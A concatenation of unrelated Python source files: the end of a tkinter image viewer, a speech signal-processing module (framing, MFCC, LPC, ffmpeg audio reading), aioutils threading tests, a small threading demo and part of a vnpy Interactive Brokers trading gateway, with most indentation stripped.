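    #     img = np.random.randint(0, 255, (240, 320, 3), dtype=np.uint8)
    #     out = APP.vignette(img, scale=1.5)  # same shape as img, darkened edges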
def _check_model(self):
if not self._model_loaded():
pop_msg.showinfo("Hmm..", "請先選擇模型!")
return False
else:
return True
def _check_image(self):
if not self._image_loaded():
pop_msg.showinfo("Umm..", "請先開啟圖片!")
return False
else:
return True
def _get_model_list(self):
base_dir = self.model_dir
return glob.glob(base_dir + "/*.pb")
@staticmethod
def _get_model_name(path):
return os.path.basename(path.replace(".pb", ''))
def _get_model_path(self, name):
return self.model_dir + '/' + name + ".pb"
def isnumeric_or_blank(my_str: str):
return my_str.isnumeric() or my_str == ''
class ResizingCanvas(tk.Canvas):
image: PhotoImage
def __init__(self, parent, **args):
        super().__init__(parent, **args)
self.main_image = None
self.width = self.winfo_width()
self.height = self.winfo_height()
self.lock = RLock()
self._should_update = False
self.bind("<Configure>", self.on_resize)
self._update_handler()
self.main_image_tk = None
self.image_pi = None
def _update_handler(self, interval=200):
with self.lock:
if self._should_update:
self.update_now()
self._should_update = False
self.after(interval, lambda: self._update_handler(interval))
def on_resize(self, event):
self.request_update()
# self.update()
def request_update(self):
with self.lock:
self._should_update = True
def update_now(self, *args):
self.width = self.winfo_width()
self.height = self.winfo_height()
image = self.main_image
if image is not None:
w, h = image.size
scale = min((self.width / w), (self.height / h))
image_resize = image.resize((int(w * scale), (int(h * scale))), Image.ANTIALIAS)
self.image_pi = ImageTk.PhotoImage(image=image_resize)
# self.delete("all")
self.main_image_tk = self.create_image(self.width / 2, self.height / 2, anchor='center',
image=self.image_pi)
self.image = self.image_pi
self.update()
def set_main_image(self, image: Image):
if self.image_pi is not None:
w, h = image.size
scale = min((self.width / w), (self.height / h))
image_resize = image.resize((int(w * scale), (int(h * scale))), Image.ANTIALIAS)
self.image = image_resize
self.image_pi = ImageTk.PhotoImage(image=image_resize)
self.itemconfigure(self.main_image_tk, image=self.image_pi)
# self.image = image
self.main_image = image
def resource_path(relative_path):
if hasattr(sys, '_MEIPASS'):
return sys._MEIPASS + '/' + relative_path
return os.path.join(os.path.dirname(os.path.abspath(__file__)), relative_path)
if __name__ == '__main__':
app = APP()
app.run()
|
sigproc.py
|
# https://github.com/jameslyons/python_speech_features
# This file includes routines for basic signal processing including framing and computing power spectra.
# Author: James Lyons 2012
#
# This file was updated with additional speech processing routines for feature extraction, such as MFCC and LPC
# Author: Anurag Chowdhury 2020
import sys, os
import decimal
import numpy as np
import math
import logging
import librosa as lr
from scipy import fix, signal, stats
import subprocess as sp
from threading import Thread
from queue import Queue, Empty
import random
import hdf5storage
from IPython.display import Audio
import librosa
## IGNORE WARNINGS
import warnings
print('TURNING OFF WARNINGS in tools/sigproc.py!!')
warnings.filterwarnings("ignore")
def round_half_up(number):
return int(decimal.Decimal(number).quantize(decimal.Decimal('1'), rounding=decimal.ROUND_HALF_UP))
def rolling_window(a, window, step=1):
# http://ellisvalentiner.com/post/2017-03-21-np-strides-trick
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)[::step]
def framesig(sig, frame_len, frame_step, winfunc=lambda x: np.ones((x,)), stride_trick=True):
"""Frame a signal into overlapping frames.
:param sig: the audio signal to frame.
:param frame_len: length of each frame measured in samples.
:param frame_step: number of samples after the start of the previous frame that the next frame should begin.
:param winfunc: the analysis window to apply to each frame. By default no window is applied.
:param stride_trick: use stride trick to compute the rolling window and window multiplication faster
:returns: an array of frames. Size is NUMFRAMES by frame_len.
"""
slen = len(sig)
frame_len = int(round_half_up(frame_len))
frame_step = int(round_half_up(frame_step))
if slen <= frame_len:
numframes = 1
else:
numframes = 1 + int(math.ceil((1.0 * slen - frame_len) / frame_step)) # LV
padlen = int((numframes - 1) * frame_step + frame_len)
zeros = np.zeros((padlen - slen,))
padsignal = np.concatenate((sig, zeros))
if stride_trick:
win = winfunc(frame_len)
frames = rolling_window(padsignal, window=frame_len, step=frame_step)
else:
indices = np.tile(np.arange(0, frame_len), (numframes, 1)) + np.tile(
np.arange(0, numframes * frame_step, frame_step), (frame_len, 1)).T
indices = np.array(indices, dtype=np.int32)
frames = padsignal[indices]
win = np.tile(winfunc(frame_len), (numframes, 1))
return frames * win
def deframesig(frames, siglen, frame_len, frame_step, winfunc=lambda x: np.ones((x,))):
"""Does overlap-add procedure to undo the action of framesig.
:param frames: the array of frames.
:param siglen: the length of the desired signal, use 0 if unknown. Output will be truncated to siglen samples.
:param frame_len: length of each frame measured in samples.
:param frame_step: number of samples after the start of the previous frame that the next frame should begin.
:param winfunc: the analysis window to apply to each frame. By default no window is applied.
:returns: a 1-D signal.
"""
frame_len = round_half_up(frame_len)
frame_step = round_half_up(frame_step)
numframes = np.shape(frames)[0]
assert np.shape(frames)[1] == frame_len, '"frames" matrix is wrong size, 2nd dim is not equal to frame_len'
indices = np.tile(np.arange(0, frame_len), (numframes, 1)) + np.tile(
np.arange(0, numframes * frame_step, frame_step), (frame_len, 1)).T
indices = np.array(indices, dtype=np.int32)
padlen = (numframes - 1) * frame_step + frame_len
if siglen <= 0: siglen = padlen
rec_signal = np.zeros((padlen,))
window_correction = np.zeros((padlen,))
win = winfunc(frame_len)
for i in range(0, numframes):
window_correction[indices[i, :]] = window_correction[
indices[i, :]] + win + 1e-15 # add a little bit so it is never zero
rec_signal[indices[i, :]] = rec_signal[indices[i, :]] + frames[i, :]
rec_signal = rec_signal / window_correction
return rec_signal[0:siglen]
def magspec(frames, NFFT):
"""Compute the magnitude spectrum of each frame in frames. If frames is an NxD matrix, output will be Nx(NFFT/2+1).
:param frames: the array of frames. Each row is a frame.
:param NFFT: the FFT length to use. If NFFT > frame_len, the frames are zero-padded.
:returns: If frames is an NxD matrix, output will be Nx(NFFT/2+1). Each row will be the magnitude spectrum of the corresponding frame.
"""
if np.shape(frames)[1] > NFFT:
        logging.warning(
'frame length (%d) is greater than FFT size (%d), frame will be truncated. Increase NFFT to avoid.',
np.shape(frames)[1], NFFT)
complex_spec = np.fft.rfft(frames, NFFT)
return np.absolute(complex_spec)
def powspec(frames, NFFT):
"""Compute the power spectrum of each frame in frames. If frames is an NxD matrix, output will be Nx(NFFT/2+1).
:param frames: the array of frames. Each row is a frame.
:param NFFT: the FFT length to use. If NFFT > frame_len, the frames are zero-padded.
:returns: If frames is an NxD matrix, output will be Nx(NFFT/2+1). Each row will be the power spectrum of the corresponding frame.
"""
return 1.0 / NFFT * np.square(magspec(frames, NFFT))
def logpowspec(frames, NFFT, norm=1):
"""Compute the log power spectrum of each frame in frames. If frames is an NxD matrix, output will be Nx(NFFT/2+1).
:param frames: the array of frames. Each row is a frame.
:param NFFT: the FFT length to use. If NFFT > frame_len, the frames are zero-padded.
:param norm: If norm=1, the log power spectrum is normalised so that the max value (across all frames) is 0.
:returns: If frames is an NxD matrix, output will be Nx(NFFT/2+1). Each row will be the log power spectrum of the corresponding frame.
"""
    ps = powspec(frames, NFFT)
ps[ps <= 1e-30] = 1e-30
lps = 10 * np.log10(ps)
if norm:
return lps - np.max(lps)
else:
return lps
def preemphasis(signal, coeff=0.95):
"""perform preemphasis on the input signal.
:param signal: The signal to filter.
:param coeff: The preemphasis coefficient. 0 is no filter, default is 0.95.
:returns: the filtered signal.
"""
return np.append(signal[0], signal[1:] - coeff * signal[:-1])
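# Worked example (comment only): with the default coeff=0.95,
#     preemphasis(np.array([1.0, 1.0, 1.0])) -> array([1.  , 0.05, 0.05])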
def normalize_audio(file_data, classes=256):
file_data = lr.util.normalize(file_data)
quantized_data = quantize_data(file_data, classes)
return quantized_data
def normalize_frame(frame, axis = 0):
min_val = np.expand_dims(np.amin(frame,axis = 0),axis=0)
min_frame = np.tile(min_val, [frame.shape[0],1])
max_val = np.expand_dims(np.amax(frame,axis = 0),axis=0)
max_frame = np.tile(max_val, [frame.shape[0],1])
frame_normalized =(frame-min_frame)/(max_frame-min_frame)
return frame_normalized
def generate_audio(audio_vec, classes=256):
# bins_0_1 = np.linspace(0, 1, classes)
# audio_vec = np.digitize(audio_vec, bins_0_1) - 1
generated = audio_vec
# generated = (audio_vec / classes) * 2. - 1
mu_gen = mu_law_expansion(generated, classes)
return mu_gen
def quantize_data(data, classes):
mu_x = mu_law_encoding(data, classes)
bins = np.linspace(-1, 1, classes)
#quantized = mu_x
quantized = np.digitize(mu_x, bins) - 1
#bins_0_1 = np.linspace(0, 1, classes)
#quantized = bins_0_1[quantized]
return quantized
def mu_law_encoding(data, mu):
mu_x = np.sign(data) * np.log(1 + mu * np.abs(data)) / np.log(mu + 1)
return mu_x
def mu_law_expansion(data, mu):
s = np.sign(data) * (np.exp(np.abs(data) * np.log(mu + 1)) - 1) / mu
return s
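# Note (comment only): mu_law_expansion inverts mu_law_encoding, e.g.
#     mu_law_expansion(mu_law_encoding(0.5, 255), 255)  # -> 0.5 (up to float error)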
def read_frame_from_file(filepath):
# filepath = '/scratch2/chowdh51/Data/degradedTIMIT/P3/eval/FADG0/SA1.mat'
mat = hdf5storage.loadmat(filepath)
frame = np.array(mat['data'])
return frame
def frame_to_audio(frame, win):
inv_win = 1/win
inv_win = np.expand_dims(inv_win, axis=1)
inv_win = np.tile(inv_win, (1,frame.shape[1]))
frame = frame * inv_win
tmp= frame[int((frame.shape[0])/2):,1:]
b = np.reshape(tmp.transpose(),(1,tmp.shape[0]*tmp.shape[1])).flatten()
audio = np.concatenate((frame[:,0], b), axis=0)
return audio
def audio_to_frame(audio, win=signal.boxcar(160), inc=80):
## Same as obspy.signal.util.enframe
nx = len(audio)
nwin = len(win)
if (nwin == 1):
length = win
else:
length = nwin
nf = int(fix((nx - length + inc) // inc))
indf = inc * np.arange(nf)
inds = np.arange(length) + 1
f = audio[(np.transpose(np.vstack([indf] * length)) +
np.vstack([inds] * nf)).astype(int) - 1]
if (nwin > 1):
w = np.transpose(win)
f = f * np.vstack([w] * nf)
f = np.transpose(f)
return f
def get_frame_from_file(file_path, sr=8000, duration = None, n_channels=1, classes=256, win=signal.boxcar(160), inc=80):
## Read Audio
if(isinstance(file_path, np.ndarray)):
file_data = file_path
else:
filename, file_extension = os.path.splitext(file_path)
if(file_extension == '.mat'):
mat = hdf5storage.loadmat(file_path)
file_data = np.array(mat['audio']).flatten()
fs = np.asscalar(np.array(mat['fs']))
file_data = signal.resample(file_data, int(file_data.shape[0]*(sr/fs)))
elif(duration is None):
file_data, _ = lr.load(path=file_path, sr=sr, duration = duration, mono=n_channels==1)
else:
file_data = read_audio(file_path, sampling_rate=sr, duration = duration, n_channels=n_channels)
## Normalize Audio for input to CNN
# normalized_audio = normalize_audio(file_data, classes=classes)
normalized_audio = file_data
## Enframe Normalized Audio
frame = audio_to_frame(normalized_audio, win, inc)
# frame = frame[:,~np.all(frame == 0, axis=0)]
frame = frame[:,~(frame.sum(axis=0) == 0)] ## Remove all zero-only speech units(columns)
## axis=1 ensure normalization across frames
## axis=0 ensure normalization within frames (as done for taslp work)
# frame= stats.zscore(frame, axis=0, ddof=1)
frame = frame[:,~np.any(np.isnan(frame), axis=0)]
frame = frame[:,~np.any(np.isinf(frame), axis=0)]
## Random crop transform
# if(frame.shape[1]>200):
# idx = random.randint(0,frame.shape[1]-200)
# frame = frame[:,idx:idx+200]
return frame
def get_audio_from_frame(frame, win=signal.boxcar(160), classes=256):
## Convert frame to audio
audio_vec = frame_to_audio(frame,win)
## Convert Normalized audio back to un-Normalized audio
# gen_audio = generate_audio(audio_vec, classes=classes)
gen_audio = audio_vec
return gen_audio
def read_audio_blocking(file_path, sampling_rate = 8000, format = 's16le', acodec = 'pcm_s16le', mono = 1, bufsize=10**8, n_channels = 1, duration = 2.01):
byte_per_frame = 2
FFMPEG_BIN = "ffmpeg"
command = [ FFMPEG_BIN,
'-i', file_path,
'-f', format,
'-acodec', acodec,
                '-ar', str(sampling_rate), # output will have 'sampling_rate' Hz
'-ac', str(n_channels), # (set to '1' for mono; '2' for stereo)
'-']
pipe = sp.Popen(command, stdout=sp.PIPE, bufsize=bufsize)
raw_audio = pipe.stdout.read(np.ceil(sampling_rate*duration*n_channels*byte_per_frame).astype(int))
audio_array = np.fromstring(raw_audio, dtype="int16")
audio_array = audio_array.astype(np.float32, order='C') / 32768.0
return audio_array
def enqueue_output(out, queue, buf_size):
queue.put(out.read(np.ceil(buf_size).astype(int)))
out.close()
def read_audio(file_path, sampling_rate = 8000, format = 's16le', acodec = 'pcm_s16le', bufsize=10**4, n_channels = 1, duration = 2.01):
byte_per_frame = 2
FFMPEG_BIN = "ffmpeg"
ON_POSIX = 'posix' in sys.builtin_module_names
buf_size_2_read = sampling_rate*duration*n_channels*byte_per_frame
command = [ FFMPEG_BIN,
'-i', file_path,
'-f', format,
'-acodec', acodec,
                '-ar', str(sampling_rate), # output will have 'sampling_rate' Hz
'-ac', str(n_channels), # (set to '1' for mono; '2' for stereo)
'-']
pipe = sp.Popen(command, stdout=sp.PIPE, bufsize=bufsize, close_fds=ON_POSIX)
q = Queue()
t = Thread(target=enqueue_output, args=(pipe.stdout, q, buf_size_2_read))
t.daemon = True # thread dies with the program
t.start()
# read line without blocking
# raw_audio = q.get_nowait()
# audio_array = np.fromstring(raw_audio, dtype="int16")
# audio_array = audio_array.astype(np.float32, order='C') / 32768.0
audio_array = None
try: raw_audio = q.get() # or q.get_nowait(), q.get(timeout=.1)
except Empty:
print('Failed to read audio!!')
else:
audio_array = np.fromstring(raw_audio, dtype="int16")
audio_array = audio_array.astype(np.float32, order='C') / 32768.0
return audio_array
def get_lpc_feature(input_audio, sampling_rate, order = 20, preemphasis = True, includeDerivatives = True, win = np.hamming(160), inc = 80):
# audio, sr = librosa.load(input_audio, sr=sampling_rate)
audio = input_audio
# Pre-emphasis filter (zero is at 50 Hz)
if(preemphasis):
audio = signal.lfilter([1, -np.exp(-2*np.pi*50/sampling_rate)],1,audio)
# Get frames from input audio
frame = get_frame_from_file(audio, win=win, inc=inc, sr=sampling_rate, n_channels=1, duration = None)
c = np.zeros((frame.shape[1], order))
# Compute LPC coefficients
for i in range(c.shape[0]):
lpc_ftr = librosa.lpc(frame[:,i], order)
c[i,:] = lpc_ftr[1:]
nf = c.shape[0]
# Calculate derivative
if(includeDerivatives):
vf=np.arange(4,-5,-1)/60
ww=np.zeros(4, dtype=int)
cx = np.vstack((c[ww,:], c, c[(nf-1)*(ww+1),:]))
filtered_cx = signal.lfilter(vf,1,np.transpose(cx).flatten())
dc = np.reshape(filtered_cx,(nf+8,order),order='F')
dc = np.delete(dc, np.arange(0,8), axis=0)
c = np.hstack((c,dc))
c = np.transpose(c)
c = c.astype(np.single)
return c
def mel2frq(mel):
k = 1000/np.log(1+1000/700)
amel = np.absolute(mel)
frq = np.multiply(700*np.sign(mel), (np.exp(amel/k)-1))
return frq
def frq2mel(frq):
k = 1000/np.log(1+1000/700)
af = np.absolute(frq)
mel = np.multiply(np.sign(frq), np.log(1+af/700)*k)
return mel
def melbankm(sr, n_mels, n_fft, fmin, fmax):
melfb = librosa.filters.mel(sr = sr, n_fft = n_fft,
n_mels = n_mels, fmin = fmin, fmax = fmax, norm = None, htk = True)
melfb = melfb[:,1:melfb.shape[1]-1]*2 ## The scaling factor of 2 is used to match the result to VOICEBOX toolkit's MATLAB implementation
frq = [fmin, fmax]
mflh = frq2mel(frq)
melrng = np.matmul(mflh , np.arange(-1,2,2))
melinc = melrng/(n_mels+1)
blim = mel2frq(mflh[0]+np.multiply([0, 1, n_mels, n_mels+1],melinc))*n_fft/sr
b1 = int(np.floor(blim[0])+1)
b4 = int(np.minimum(np.floor(n_fft/2),np.ceil(blim[3])-1))
pf = (frq2mel(np.arange(b1,b4+1)*sr/n_fft)-mflh[0])/melinc
# remove any incorrect entries in pf due to rounding errors
if(pf[0]<0):
pf = np.delete(pf, (0), axis=0)
b1=b1+1
if (pf[-1]>=n_mels+1):
pf = np.delete(pf, (-1), axis=0)
        b4=b4-1
mn = b1 + 1
mx = b4 + 1
return (melfb, mn, mx)
def rdct(x):
fl=x.shape[0]==1
if(fl):
x=x.flatten()
[m,k]=x.shape
n=m
b=1
a=np.sqrt(2*n)
x=np.vstack((x[0:n+1:2,:], x[2*int(np.fix(n/2))-1:0:-2,:]))
z=np.transpose(np.concatenate(([np.sqrt(2)], 2*np.exp((-0.5j*np.pi/n)*(np.arange(1,n))))))
y=np.real(np.multiply(np.fft.fft(x,n=x.shape[0],axis=0),np.transpose(np.tile(z,(k,1)))))/a
if(fl):
y=np.transpose(y)
return y
def get_mfcc_feature(input_audio, sampling_rate, order = 20, preemphasis = True, includeDerivatives = True, win = np.hamming(160), inc = 80):
# audio, sr = librosa.load(input_audio, sr=sampling_rate)
# win = np.hamming(int(sampling_rate*0.02))
# inc = int(win.shape[0]/2)
# Pre-emphasis filter (zero is at 50 Hz)
if(preemphasis):
input_audio = signal.lfilter([1, -np.exp(-2*np.pi*50/sampling_rate)],1,input_audio)
# Get frames from input audio
frame = get_frame_from_file(input_audio, win=win, inc=inc, sr=sampling_rate, n_channels=1, duration = None)
c = np.zeros((frame.shape[1], order))
## Compute FFT
f = np.fft.rfft(frame, n=frame.shape[0], axis=0)
## Get the Mel-filterbanks
sr = sampling_rate
n_mels = int(np.floor(3*np.log(sampling_rate)))
n_fft = int(sampling_rate*0.02)
fmin = 0 * sampling_rate
fmax = 0.5 * sampling_rate
[m,a,b] = melbankm(sr, n_mels, n_fft, fmin, fmax)
pw = np.multiply(f[a-1:b,:], np.conj(f[a-1:b,:]))
pw = pw.real
pth = np.max(pw.flatten())*1E-20
## Apply DCT
ath = np.sqrt(pth)
y = np.log(np.maximum(np.matmul(m,np.absolute(f[a-1:b,:])),ath))
c = np.transpose(rdct(y))
nf = c.shape[0]
nc = order
if n_mels>nc:
c = c[:,0:nc]
elif n_mels<nc:
        c = np.hstack((c, np.zeros((nf, nc-n_mels))))
# Calculate derivative
if(includeDerivatives):
vf=np.arange(4,-5,-1)/60
ww=np.zeros(4, dtype=int)
cx = np.vstack((c[ww,:], c, c[(nf-1)*(ww+1),:]))
filtered_cx = signal.lfilter(vf,1,np.transpose(cx).flatten())
dc = np.reshape(filtered_cx,(nf+8,order),order='F')
dc = np.delete(dc, np.arange(0,8), axis=0)
c = np.hstack((c,dc))
c = np.transpose(c)
c = c.astype(np.single)
return c
def cmvn(x):
mu = np.mean(x, axis=1)
stdev = np.std(x, axis=1)
f = np.subtract(x, np.transpose(np.tile(mu,(x.shape[1],1))))
f = np.divide(f, np.transpose(np.tile(stdev,(x.shape[1],1))))
return f
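# Illustration (comment only): cmvn() normalises each coefficient across frames
# to zero mean and unit variance, e.g.
#     feats = np.random.randn(40, 100)  # 40 coefficients x 100 frames
#     normed = cmvn(feats)              # each row now has mean ~0 and std ~1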
def get_mfcc_lpc_feature(input_audio, sampling_rate, order = 20, preemphasis = True, includeDerivatives = True, win = np.hamming(160), inc = 80):
mfcc_ftr = get_mfcc_feature(input_audio, sampling_rate, order = order, preemphasis = preemphasis, includeDerivatives = includeDerivatives, win = win, inc = inc)
lpc_ftr = get_lpc_feature(input_audio, sampling_rate, order = order, preemphasis = preemphasis, includeDerivatives = includeDerivatives, win = win, inc = inc)
#CMVN
mfcc_ftr = cmvn(mfcc_ftr)
lpc_ftr = cmvn(lpc_ftr)
# Concatenate MFCC and LPC features
mfcc_lpc_ftr = np.stack((mfcc_ftr,lpc_ftr), axis=2)
mfcc_lpc_ftr = mfcc_lpc_ftr.astype(np.single)
return mfcc_lpc_ftr
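# Minimal self-test sketch (not part of the original module): frame a synthetic
# tone and compute its power spectrum. It exercises only the numpy-based helpers
# above; the signal length and frame sizes are arbitrary illustration values.
if __name__ == '__main__':
    demo_sig = np.sin(2 * np.pi * 440 * np.arange(8000) / 8000.0)
    demo_frames = framesig(demo_sig, frame_len=160, frame_step=80, winfunc=np.hamming)
    print('frames:', demo_frames.shape)  # (numframes, 160)
    print('power spectrum:', powspec(demo_frames, 256).shape)  # (numframes, NFFT/2 + 1)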
|
test_threading.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import random
import asyncio
import threading
from aioutils import Group, Yielder, yielding
@asyncio.coroutine
def f(c):
yield from asyncio.sleep(random.random()*0.02)
return c
def test_group_threading():
""" Ensure that Pool and Group are thread-safe """
stopall = False
def t():
while not stopall:
g = Group()
for i in range(5):
g.spawn(f(i))
g.join()
time.sleep(random.random()*0.02)
tasks = [threading.Thread(target=t) for _ in range(5)]
for task in tasks: task.daemon = True
for task in tasks: task.start()
time.sleep(0.2)
stopall = True
for task in tasks: task.join()
assert asyncio.Task.all_tasks() == set(), asyncio.Task.all_tasks()
def test_yielder_threading():
""" Ensure Yielder are thread safe """
stopall = False
chars = 'abcdefg'
def gen_func():
y = Yielder()
for c in chars:
y.spawn(f(c))
yield from y.yielding()
def t():
while not stopall:
chars2 = list(gen_func())
assert set(chars2) == set(chars)
time.sleep(random.random()*0.02)
tasks = [threading.Thread(target=t) for _ in range(5)]
for task in tasks: task.daemon = True
for task in tasks: task.start()
time.sleep(0.2)
stopall = True
for task in tasks: task.join()
assert asyncio.Task.all_tasks() == set(), asyncio.Task.all_tasks()
def test_mixed():
""" Ensure mixed usage are thread safe """
chars = 'abcdefg'
stopall = False
def f1():
y = Yielder()
for c in chars:
y.spawn(f(c))
return list(y.yielding())
def f2():
g = Group()
for c in chars:
g.spawn(f(c))
g.join()
def t():
while not stopall:
f = random.choice([f1, f2])
r = f()
if f == f1:
assert set(r) == set(chars)
time.sleep(random.random()*0.02)
tasks = [threading.Thread(target=t) for _ in range(5)]
for task in tasks: task.daemon = True
for task in tasks: task.start()
time.sleep(0.2)
stopall = True
for task in tasks: task.join()
assert asyncio.Task.all_tasks() == set(), asyncio.Task.all_tasks()
def test_yielding_size_in_threading():
chars = 'abcdefgh'
def f1():
with yielding(2) as y:
for c in chars:
y.spawn(f(c))
yield from y
l = []
def f2():
for x in f1():
l.append(x)
t = threading.Thread(target=f2)
t.start()
t.join()
assert set(l) == set(chars)
if __name__ == '__main__':
test_group_threading()
test_yielder_threading()
test_mixed()
test_yielding_size_in_threading()
|
basics2_thread.py
|
import threading
import time
ls =[]
def count(n):
for i in range(1, n+1):
ls.append(i)
time.sleep(0.5)
def count2(n):
for i in range(1, n+1):
ls.append(i)
time.sleep(0.5)
x = threading.Thread(target=count, args=(5,))
x.start()
y = threading.Thread(target=count2, args=(5,))
y.start()
# To synchronise the threads (i.e. wait for each function to finish), call join();
# use it only when you actually need to wait.
x.join()
y.join()
print(ls)
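# Expected result (illustrative): after both joins, ls holds the ten appended
# values, e.g. [1, 1, 2, 2, 3, 3, 4, 4, 5, 5]; the exact interleaving can vary
# between runs.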
|
ib_gateway.py
|
"""
Please install ibapi from Interactive Brokers github page.
"""
from copy import copy
from datetime import datetime
from queue import Empty
from threading import Thread
from ibapi import comm
from ibapi.client import EClient
from ibapi.common import MAX_MSG_LEN, NO_VALID_ID, OrderId, TickAttrib, TickerId
from ibapi.contract import Contract, ContractDetails
from ibapi.execution import Execution
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.ticktype import TickType
from ibapi.wrapper import EWrapper
from ibapi.errors import BAD_LENGTH
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
OrderRequest,
CancelRequest,
SubscribeRequest
)
from vnpy.trader.constant import (
Product,
OrderType,
Direction,
Exchange,
Currency,
Status,
OptionType,
)
ORDERTYPE_VT2IB = {OrderType.LIMIT: "LMT", OrderType.MARKET: "MKT"}
ORDERTYPE_IB2VT = {v: k for k, v in ORDERTYPE_VT2IB.items()}
DIRECTION_VT2IB = {Direction.LONG: "BUY", Direction.SHORT: "SELL"}
DIRECTION_IB2VT = {v: k for k, v in DIRECTION_VT2IB.items()}
DIRECTION_IB2VT["BOT"] = Direction.LONG
DIRECTION_IB2VT["SLD"] = Direction.SHORT
EXCHANGE_VT2IB = {
Exchange.SMART: "SMART",
Exchange.NYMEX: "NYMEX",
Exchange.GLOBEX: "GLOBEX",
Exchange.IDEALPRO: "IDEALPRO",
Exchange.CME: "CME",
Exchange.ICE: "ICE",
Exchange.SEHK: "SEHK",
Exchange.HKFE: "HKFE",
}
EXCHANGE_IB2VT = {v: k for k, v in EXCHANGE_VT2IB.items()}
STATUS_IB2VT = {
"Submitted": Status.NOTTRADED,
"Filled": Status.ALLTRADED,
"Cancelled": Status.CANCELLED,
"PendingSubmit": Status.SUBMITTING,
"PreSubmitted": Status.NOTTRADED,
}
PRODUCT_VT2IB = {
Product.EQUITY: "STK",
Product.FOREX: "CASH",
Product.SPOT: "CMDTY",
Product.OPTION: "OPT",
Product.FUTURES: "FUT",
}
PRODUCT_IB2VT = {v: k for k, v in PRODUCT_VT2IB.items()}
OPTION_VT2IB = {OptionType.CALL: "CALL", OptionType.PUT: "PUT"}
CURRENCY_VT2IB = {
Currency.USD: "USD",
Currency.CNY: "CNY",
Currency.HKD: "HKD",
}
TICKFIELD_IB2VT = {
0: "bid_volume_1",
1: "bid_price_1",
2: "ask_price_1",
3: "ask_volume_1",
4: "last_price",
5: "last_volume",
6: "high_price",
7: "low_price",
8: "volume",
9: "pre_close",
14: "open_price",
}
ACCOUNTFIELD_IB2VT = {
"NetLiquidationByCurrency": "balance",
"NetLiquidation": "balance",
"UnrealizedPnL": "positionProfit",
"AvailableFunds": "available",
"MaintMarginReq": "margin",
}
class IbGateway(BaseGateway):
""""""
default_setting = {
"TWS地址": "127.0.0.1",
"TWS端口": 7497,
"客户号": 1
}
def __init__(self, event_engine):
""""""
super(IbGateway, self).__init__(event_engine, "IB")
self.api = IbApi(self)
def connect(self, setting: dict):
"""
Start gateway connection.
"""
host = setting["TWS地址"]
port = setting["TWS端口"]
clientid = setting["客户号"]
self.api.connect(host, port, clientid)
def close(self):
"""
Close gateway connection.
"""
self.api.close()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
self.api.subscribe(req)
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
return self.api.send_order(req)
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
self.api.cancel_order(req)
def query_account(self):
"""
Query account balance.
"""
pass
def query_position(self):
"""
Query holding positions.
"""
pass
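# Usage sketch (comment only, not part of the original file): wiring the gateway
# into a script, assuming a running TWS instance on the paper-trading port and
# that vnpy exposes EventEngine as shown below.
#     from vnpy.event import EventEngine
#     event_engine = EventEngine()
#     ib_gateway = IbGateway(event_engine)
#     ib_gateway.connect({"TWS地址": "127.0.0.1", "TWS端口": 7497, "客户号": 1})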
class IbApi(EWrapper):
""""""
def __init__(self, gateway: BaseGateway):
""""""
super(IbApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.status = False
self.reqid = 0
self.orderid = 0
self.clientid = 0
self.ticks = {}
self.orders = {}
self.accounts = {}
self.contracts = {}
self.tick_exchange = {}
self.client = IbClient(self)
self.thread = Thread(target=self.client.run)
def connectAck(self): # pylint: disable=invalid-name
"""
Callback when connection is established.
"""
self.status = True
self.gateway.write_log("IB TWS连接成功")
def connectionClosed(self): # pylint: disable=invalid-name
"""
Callback when connection is closed.
"""
self.status = False
self.gateway.write_log("IB TWS连接断开")
def nextValidId(self, orderId: int): # pylint: disable=invalid-name
"""
Callback of next valid orderid.
"""
super(IbApi, self).nextValidId(orderId)
self.orderid = orderId
def currentTime(self, time: int): # pylint: disable=invalid-name
"""
Callback of current server time of IB.
"""
super(IbApi, self).currentTime(time)
dt = datetime.fromtimestamp(time)
time_string = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
msg = f"服务器时间: {time_string}"
self.gateway.write_log(msg)
def error(
self, reqId: TickerId, errorCode: int, errorString: str
): # pylint: disable=invalid-name
"""
Callback of error caused by specific request.
"""
super(IbApi, self).error(reqId, errorCode, errorString)
msg = f"信息通知,代码:{errorCode},内容: {errorString}"
self.gateway.write_log(msg)
def tickPrice( # pylint: disable=invalid-name
self, reqId: TickerId, tickType: TickType, price: float, attrib: TickAttrib
):
"""
Callback of tick price update.
"""
super(IbApi, self).tickPrice(reqId, tickType, price, attrib)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, price)
# Update name into tick data.
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
# Forex and spot product of IDEALPRO has no tick time and last price.
# We need to calculate locally.
exchange = self.tick_exchange[reqId]
if exchange is Exchange.IDEALPRO:
tick.last_price = (tick.bid_price_1 + tick.ask_price_1) / 2
tick.datetime = datetime.now()
self.gateway.on_tick(copy(tick))
def tickSize(
self, reqId: TickerId, tickType: TickType, size: int
): # pylint: disable=invalid-name
"""
Callback of tick volume update.
"""
super(IbApi, self).tickSize(reqId, tickType, size)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, size)
self.gateway.on_tick(copy(tick))
def tickString(
self, reqId: TickerId, tickType: TickType, value: str
): # pylint: disable=invalid-name
"""
Callback of tick string update.
"""
super(IbApi, self).tickString(reqId, tickType, value)
if tickType != "45":
return
tick = self.ticks[reqId]
tick.datetime = datetime.fromtimestamp(value)
self.gateway.on_tick(copy(tick))
def orderStatus( # pylint: disable=invalid-name
self,
orderId: OrderId,
status: str,
filled: float,
remaining: float,
avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float,
):
"""
Callback of order status update.
"""
super(IbApi, self).orderStatus(
orderId,
status,
filled,
remaining,
avgFillPrice,
permId,
parentId,
lastFillPrice,
clientId,
whyHeld,
mktCapPrice,
)
orderid = str(orderId)
